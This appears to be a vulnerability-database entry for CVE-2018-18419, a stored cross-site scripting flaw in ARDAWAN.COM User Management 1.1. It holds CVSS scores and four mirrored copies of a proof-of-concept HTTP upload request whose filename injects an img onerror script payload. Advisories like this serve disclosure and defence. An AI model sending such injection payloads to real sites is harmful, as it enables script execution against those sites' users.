ID CVE-2018-18419
Type cve
Reporter cve@mitre.org
Modified 2018-12-04T15:35:00
Description
Stored XSS has been discovered in the upload section of ARDAWAN.COM User Management 1.1, as demonstrated by a .jpg filename to the /account URI.
{"id": "CVE-2018-18419", "bulletinFamily": "NVD", "title": "CVE-2018-18419", "description": "Stored XSS has been discovered in the upload section of ARDAWAN.COM User Management 1.1, as demonstrated by a .jpg filename to the /account URI.", "published": "2018-10-19T22:29:00", "modified": "2018-12-04T15:35:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18419", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/45686/", "http://packetstormsecurity.com/files/149850/User-Management-1.1-Cross-Site-Scripting.html"], "cvelist": ["CVE-2018-18419"], "type": "cve", "lastseen": "2021-02-02T06:52:33", "edition": 4, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:149850"]}, {"type": "zdt", "idList": ["1337DAY-ID-31429"]}, {"type": "exploitdb", "idList": ["EDB-ID:45686"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0ED0FE46AB8AA4BB1DEA9C2880DF959E"]}], "modified": "2021-02-02T06:52:33", "rev": 2}, "score": {"value": 3.0, "vector": "NONE", "modified": "2021-02-02T06:52:33", "rev": 2}, "vulnersScore": 3.0}, "cpe": ["cpe:/a:ardawan:user_management:1.1"], "affectedSoftware": [{"cpeName": "ardawan:user_management", "name": "ardawan user management", "operator": "eq", "version": "1.1"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "cpe23": ["cpe:2.3:a:ardawan:user_management:1.1:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:ardawan:user_management:1.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/149850/User-Management-1.1-Cross-Site-Scripting.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/149850/User-Management-1.1-Cross-Site-Scripting.html"}, {"name": "45686", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/45686/"}]}
{"packetstorm": [{"lastseen": "2018-10-18T10:13:12", "description": "", "published": "2018-10-18T00:00:00", "type": "packetstorm", "title": "User Management 1.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18419"], "modified": "2018-10-18T00:00:00", "id": "PACKETSTORM:149850", "href": "https://packetstormsecurity.com/files/149850/User-Management-1.1-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: User Management 1.1 - Cross-site Scripting \n# Date: 2018-10-16 \n# Exploit Author: Ismail Tasdelen \n# Vendor Homepage: http://ardawan.com/ \n# Software Link : http://um.ardawan.com \n# Software : User Management \n# Version : 1.1 \n# Vulernability Type : Cross-site Scripting \n# Vulenrability : Stored XSS \n# CVE : CVE-2018-18419 \n \n# Stored XSS has been discovered in the upload section of ARDAWAN.COM User Management 1.1, as demonstrated by a .jpg filename to the /account URI. \n \n# HTTP POST Request : \n \nPOST /Cpanel/account HTTP/1.1 \nHost: um.ardawan.com \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://um.ardawan.com/Cpanel/account \nContent-Type: multipart/form-data; boundary=---------------------------7088451293981732581393631504 \nContent-Length: 1574638 \nCookie: ci_session=cmq2fvkbgc133i8amc4sadmpl216iplt; UM_sessID=ovno91tjrd0qo8dc5d2il0teronrn9k1; _ga=GA1.2.1869398047.1539664507; _gid=GA1.2.268810780.1539664507 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n-----------------------------7088451293981732581393631504 \nContent-Disposition: form-data; name=\"fullName\" \n \nAdmin \n-----------------------------7088451293981732581393631504 \nContent-Disposition: form-data; name=\"profileImage\"; filename=\"\\\"><img src=x onerror=alert(\\\"ismailtasdelen\\\")>.jpg\" \nContent-Type: image/jpeg \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149850/CVE-2018-18419.txt"}], "zdt": [{"lastseen": "2018-10-26T02:44:27", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-10-25T00:00:00", "title": "User Management 1.1 - Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18419"], "modified": "2018-10-25T00:00:00", "id": "1337DAY-ID-31429", "href": "https://0day.today/exploit/description/31429", "sourceData": "# Exploit Title: User Management 1.1 - Cross-Site Scripting\r\n# Exploit Author: Ismail Tasdelen\r\n# Vendor Homepage: http://ardawan.com/\r\n# Software Link : http://um.ardawan.com\r\n# Software : User Management\r\n# Version : 1.1\r\n# Vulernability Type : Cross-site Scripting\r\n# Vulenrability : Stored XSS\r\n# CVE : CVE-2018-18419\r\n \r\n# Stored XSS has been discovered in the upload section of ARDAWAN.COM User Management 1.1,\r\n# as demonstrated by a .jpg filename to the /account URI.\r\n \r\n# HTTP POST Request :\r\n \r\nPOST /Cpanel/account HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://TARGET/Cpanel/account\r\nContent-Type: multipart/form-data; boundary=---------------------------7088451293981732581393631504\r\nContent-Length: 1574638\r\nCookie: ci_session=cmq2fvkbgc133i8amc4sadmpl216iplt; UM_sessID=ovno91tjrd0qo8dc5d2il0teronrn9k1; _ga=GA1.2.1869398047.1539664507; _gid=GA1.2.268810780.1539664507\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n \r\n-----------------------------7088451293981732581393631504\r\nContent-Disposition: form-data; name=\"fullName\"\r\n \r\nAdmin\r\n-----------------------------7088451293981732581393631504\r\nContent-Disposition: form-data; name=\"profileImage\"; filename=\"\\\"><img src=x onerror=alert(\\\"ismailtasdelen\\\")>.jpg\"\r\nContent-Type: image/jpeg\n\n# 0day.today [2018-10-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31429"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:35", "description": "", "published": "2018-10-25T00:00:00", "type": "exploitdb", "title": "User Management 1.1 - Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18419"], "modified": "2018-10-25T00:00:00", "id": "EDB-ID:45686", "href": "https://www.exploit-db.com/exploits/45686", "sourceData": "# Exploit Title: User Management 1.1 - Cross-Site Scripting\r\n# Date: 2018-10-16\r\n# Exploit Author: Ismail Tasdelen\r\n# Vendor Homepage: http://ardawan.com/\r\n# Software Link : http://um.ardawan.com\r\n# Software : User Management\r\n# Version : 1.1\r\n# Vulernability Type : Cross-site Scripting\r\n# Vulenrability : Stored XSS\r\n# CVE : CVE-2018-18419\r\n\r\n# Stored XSS has been discovered in the upload section of ARDAWAN.COM User Management 1.1,\r\n# as demonstrated by a .jpg filename to the /account URI.\r\n \r\n# HTTP POST Request :\r\n\r\nPOST /Cpanel/account HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://TARGET/Cpanel/account\r\nContent-Type: multipart/form-data; boundary=---------------------------7088451293981732581393631504\r\nContent-Length: 1574638\r\nCookie: ci_session=cmq2fvkbgc133i8amc4sadmpl216iplt; UM_sessID=ovno91tjrd0qo8dc5d2il0teronrn9k1; _ga=GA1.2.1869398047.1539664507; _gid=GA1.2.268810780.1539664507\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n-----------------------------7088451293981732581393631504\r\nContent-Disposition: form-data; name=\"fullName\"\r\n\r\nAdmin\r\n-----------------------------7088451293981732581393631504\r\nContent-Disposition: form-data; name=\"profileImage\"; filename=\"\\\"><img src=x onerror=alert(\\\"ismailtasdelen\\\")>.jpg\"\r\nContent-Type: image/jpeg", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45686"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:52", "description": "\nUser Management 1.1 - Cross-Site Scripting", "edition": 1, "published": "2018-10-25T00:00:00", "title": "User Management 1.1 - Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18419"], "modified": "2018-10-25T00:00:00", "id": "EXPLOITPACK:0ED0FE46AB8AA4BB1DEA9C2880DF959E", "href": "", "sourceData": "# Exploit Title: User Management 1.1 - Cross-Site Scripting\n# Date: 2018-10-16\n# Exploit Author: Ismail Tasdelen\n# Vendor Homepage: http://ardawan.com/\n# Software Link : http://um.ardawan.com\n# Software : User Management\n# Version : 1.1\n# Vulernability Type : Cross-site Scripting\n# Vulenrability : Stored XSS\n# CVE : CVE-2018-18419\n\n# Stored XSS has been discovered in the upload section of ARDAWAN.COM User Management 1.1,\n# as demonstrated by a .jpg filename to the /account URI.\n \n# HTTP POST Request :\n\nPOST /Cpanel/account HTTP/1.1\nHost: TARGET\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://TARGET/Cpanel/account\nContent-Type: multipart/form-data; boundary=---------------------------7088451293981732581393631504\nContent-Length: 1574638\nCookie: ci_session=cmq2fvkbgc133i8amc4sadmpl216iplt; UM_sessID=ovno91tjrd0qo8dc5d2il0teronrn9k1; _ga=GA1.2.1869398047.1539664507; _gid=GA1.2.268810780.1539664507\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------7088451293981732581393631504\nContent-Disposition: form-data; name=\"fullName\"\n\nAdmin\n-----------------------------7088451293981732581393631504\nContent-Disposition: form-data; name=\"profileImage\"; filename=\"\\\"><img src=x onerror=alert(\\\"ismailtasdelen\\\")>.jpg\"\nContent-Type: image/jpeg", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}]}
